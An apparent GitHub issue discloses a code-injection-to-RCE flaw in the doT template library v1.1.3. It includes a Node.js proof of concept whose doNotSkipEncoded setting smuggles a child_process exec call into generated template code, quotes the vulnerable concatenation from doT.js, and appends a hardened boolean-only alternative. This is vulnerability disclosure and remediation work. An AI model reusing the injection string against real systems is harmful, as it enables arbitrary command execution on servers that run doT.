
In this library, there is a 'Code Injection to RCE' vuln

Open shyeun opened this issue 1 year ago • 0 comments

I found this in the doT library v1.1.3. This is a PoC:

const doT = require('dot');

doT.templateSettings = {
  evaluate: /\{\{([\s\S]+?(\}?)+)\}\}/g,
  interpolate: /\{\{=([\s\S]+?)\}\}/g,
  encode: /\{\{!([\s\S]+?)\}\}/g,
  use: /\{\{#([\s\S]+?)\}\}/g,
  define: /\{\{##\s*([\w\.$]+)\s*(\:|=)([\s\S]+?)#\}\}/g,
  conditional: /\{\{\?(\?)?\s*([\s\S]*?)\s*\}\}/g,
  iterate: /\{\{~\s*(?:\}\}|([\s\S]+?)\s*\:\s*([\w$]+)\s*(?:\:\s*([\w$]+))?\s*\}\})/g,
  varname: 'it',
  strip: true,
  append: true,
  selfcontained: false,
  // this setting is concatenated verbatim into the generated template source
  doNotSkipEncoded: `123));process.mainModule.constructor._load('child_process').exec('calc.exe');((11`,
};

// the encode tag ({{! ... }}) is what makes doT emit the encodeHTML helper
const template = doT.template(`
{{!it.exploit}}
`);

const data = {
  exploit: 'exploit',
};

const result = template(data);
console.log(result);

If the code uses the encode option, then doNotSkipEncoded's value is inserted into this code (node_modules/dot/doT.js).

...
if (needhtmlencode) {
	if (!c.selfcontained && _globals && !_globals._encodeHTML) _globals._encodeHTML = doT.encodeHTMLSource(c.doNotSkipEncoded);
	str = "var encodeHTML = typeof _encodeHTML !== 'undefined' ? _encodeHTML : ("
		+ doT.encodeHTMLSource.toString() + "(" + (c.doNotSkipEncoded || '') + "));"
		+ str;
}
...

If you have another opinion, I want to talk about this vuln with you. Thank you.

shyeun, Nov 29 '23 00:11
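The defect the issue points at is a code-generation pattern: a settings value is concatenated into JavaScript source that doT later turns into a function, so a string value becomes code. The following is an added example, not doT's own code or the reporter's: `encodeHTMLSource` is a simplified stand-in for `doT.encodeHTMLSource`, and `buildEncoderSourceUnsafe`, `buildEncoderSourceSafe`, `validateSettings` and `compileEncoder` are hypothetical helper names. It places the concatenation shown in the quoted snippet next to a hardened form that emits only a boolean literal, plus an up-front type check for the settings object.

```javascript
// Simplified stand-in for doT.encodeHTMLSource: returns an HTML encoder whose
// source is self-contained, so fn.toString() can be spliced into generated code.
function encodeHTMLSource(doNotSkipEncoded) {
  var encodeHTMLRules = { "&": "&#38;", "<": "&#60;", ">": "&#62;", '"': "&#34;", "'": "&#39;", "/": "&#47;" };
  // With doNotSkipEncoded set, '&' is rewritten even when it already starts an entity.
  var matchHTML = doNotSkipEncoded ? /[&<>"'\/]/g : /&(?!#?\w+;)|[<>"'\/]/g;
  return function (code) {
    return code ? code.toString().replace(matchHTML, function (m) { return encodeHTMLRules[m] || m; }) : "";
  };
}

// Defective pattern from the issue: the raw setting value is concatenated into
// source text that is later evaluated, so a string value is executed as code.
function buildEncoderSourceUnsafe(settings) {
  return "(" + encodeHTMLSource.toString() + "(" + (settings.doNotSkipEncoded || "") + "))";
}

// Hardened pattern: the setting is a boolean by contract, so coerce it and emit
// only the literal true/false. No caller-controlled text reaches the source.
function buildEncoderSourceSafe(settings) {
  var flag = JSON.stringify(Boolean(settings.doNotSkipEncoded));
  return "(" + encodeHTMLSource.toString() + "(" + flag + "))";
}

// Up-front check for settings objects that may be influenced by configuration:
// anything other than a boolean is rejected before it can reach code generation.
function validateSettings(settings) {
  var v = settings.doNotSkipEncoded;
  if (v !== undefined && typeof v !== "boolean") {
    throw new TypeError("doNotSkipEncoded must be a boolean, got " + typeof v);
  }
  return settings;
}

// Mirrors how generated source becomes a function (doT uses new Function()).
function compileEncoder(source) {
  return new Function("return " + source)();
}

// Constructed, harmless marker standing in for a string-typed setting value.
var MARKER = "true));/*marker*/((false";
// With the unsafe builder the marker lands in the source verbatim; with the safe one it cannot.
var unsafeLeaksSetting = buildEncoderSourceUnsafe({ doNotSkipEncoded: MARKER }).indexOf("/*marker*/") !== -1; // true
var safeLeaksSetting = buildEncoderSourceSafe({ doNotSkipEncoded: MARKER }).indexOf("/*marker*/") !== -1;    // false
```

The safe builder still honours the setting's intent: a truthy value yields an encoder that rewrites every `&`, a falsy one leaves existing entities alone.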